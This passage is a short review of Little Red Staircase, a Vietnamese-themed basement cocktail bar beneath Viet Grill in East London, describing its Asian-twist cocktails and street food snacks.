new cocktail bar has popped up in a basement in East London and this one’s not only located in East, it also has an Eastern theme based on the traditional Vietnamese cocktail bars of Old Saigon.

Little Red Staircase is below Viet Grill, just down a little red staircase (clue’s in the name!) and features a short cocktail list of classics with an Asian twist and a small offering of Vietnamese street food dishes – think crispy rock shrimp with kimchee mayo and mini pork kebabs with lime curry sea salt dip. We sipped on Viet Royals, a mix of plum wine, aloe vera, jasmine tea and prosecco and Hoa Hongs, made up of hibiscus flower, aperol, sake and prosecco.

A great place to chill out with some cocktails and nibbles before dinner and a welcome twist on the cocktail bars springing up across the hood.
